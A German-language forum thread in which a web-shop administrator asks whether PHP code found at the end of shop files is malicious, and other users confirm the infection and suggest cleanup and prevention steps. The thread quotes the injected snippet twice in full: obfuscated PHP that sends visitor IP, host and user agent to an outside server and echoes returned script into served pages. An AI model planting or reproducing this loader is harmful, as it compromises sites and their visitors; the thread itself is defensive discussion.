Schadcode oder nicht?

[Chopper-Fahrer]

Mein Virenprogramm springt an, wenn ich auf einen von mir verwalteten Shop gehe.

Leider finde ich den Schadcode nicht wirklich. Habe nur folgenden Code gefunden, der mir komisch vorkommt.

includes/modules/default.php

ganz unten

Code: PHP  [Auswählen]

<?php
#405639#
error_reporting(0); ini_set('display_errors',0); $wp_l6638 = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_l6638) && !preg_match ('/bot/i', $wp_l6638))){

$wp_l096638="http://"."http"."title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_l6638);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l096638);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6638l = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_6638l,1,3) === 'scr' ){ echo $wp_6638l; }
#/405639#
?>
<?php

?>

Gehört der Code da rein??
Denn in alten Dateiversionen habe ich das nicht gefunden. Weiß aber nicht ob das durch irgendein Update mal geändert wurde und der Code nun hier reingehört. Zumal ich ähnlichen Code auch in anderen Dateien nun finde

Linkback: https://www.modified-shop.org/forum/index.php?topic=30636.0

[Modulfux]

Nee, du hast den Schadcode damit gefunden. Schaue bitte gleichzeitig in allen Dateien, die auf .js enden und auch in alle Dateien, welche mit index, start und default anfangen.

Gruß
Ronny

[Chopper-Fahrer]

Danke!

Auf was muss ich da genau achten in den Dateien, wie erkenne ich den Schadcode am schnellsten?

in der general.js.php sieht der so aus

Code: PHP  [Auswählen]

<?php
#7dbd6b#
error_reporting(0); ini_set('display_errors',0); $wp_l6638 = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_l6638) && !preg_match ('/bot/i', $wp_l6638))){

$wp_l096638="http://"."http"."title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_l6638);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l096638);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6638l = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_6638l,1,3) === 'scr' ){ echo $wp_6638l; }
#/7dbd6b#
?>


<?php

Muß ich am besten nach "wp_6638" suchen?

[ado]

Jau, auch befallen.

Am Besten ein komplettes Backup machen.

Ansonsten (suboptimal) kannst Du auch mit dem FTP-Programm alle Verzeichnisse durchgehen und Dir die files nach Alter sortiert anschauen - die mit dem Virus sind die "jungen".

Auch files mit den Namen header, admin, werden gern genommen.

Gruß
ado

[Chopper-Fahrer]

Vielen Dank für Hilfe, Backup nicht zur Hand, deshalbmuss ich es von Hand machen.
Wäre halt mal interessant an was man die Schadcodes am besten/schnellsten erkennt und wie man es verhindern kann das sich ständig solche Sachen einnisten

[ShopNix]

Den Kameraden habe ich mehrfach gefunden, allerdings nur im Template-Cache, und erst nachdem der jeweilige Provider bereits Schadcode aus .js-Files entfernt hatte.

Ein paar Hinweise kann ich Dir geben:

Die Variablen-Namen und der Kommentar, der wie ein Farbcode aussieht, war unterschiedlich. Auch die URL war eine andere.

Der Code-Schnipsel telefoniert nur nach Hause, der eigentliche Schadcode war angeblich in .js-Files

[astaller]

Hallo,

fürs nächste mal: MODUL: Prüfsummenscanner Deutsch / English

Damit siehst du dann recht schnell welche Dateien geändert wurden.
Wichtig ist nur, wenn du zwischendruch selbst Dateien änderst, musst eine neue Prüfsumme generieren lassen.

MfG
Achim S.

[burrito]

... und wie man es verhindern kann das sich ständig solche Sachen einnisten

Nun ich hoffe doch, dass sich "solche Sachen" bei Dir nicht ständig einnisten!

Der häufigste Einfallsweg ist der Rechner von dem aus Du per FTP auf Deinen Web-Space zugreifst.

Also:
1. Von garantiert gesundem (Virenscanner laufen lassen!) Rechner aus FTP- und DB-Passwort ändern.
2. Verdächtiger Rechner ausführlich mit Virenscanner prüfen.
3. Wenn Du Filezilla verwendest, dann Passwort nicht speichern oder besser auf anderes FTP-Programm (z. B. WinScp) umsteigen. (Filzilla speichert dein Passwort im Klartext auf der Festplatte)
4. Weitere Tipps beachten!

burrito

[ado]

Übrigens .....

ich wollte mir mal die früheren Beiträge vom Chopper-Fahrer ansehen, weil ich war eben neugierig.

Und was passiert, wenn man auf das Profil vom Chopper-Fahrer geht und dann auf "Beiträge anzeigen klickt?

Das hier : (siehe unten)

Du scheinst ernste Probleme zu haben, Chopper.

Gruß ado

PS: bei anderen Profilen is alles okay

[Christian|PCE]

Nein Ado, das Problem liegt woanders. In der Beitragsliste ist ein Iframe-Codeschnipsel mit infizierter JS Datei eingebettet, deshalb tickt dein Avast aus. Am Forum liegt es nicht, wenn wären dann alle betroffen

[ado]

ja na klar! 

Sorry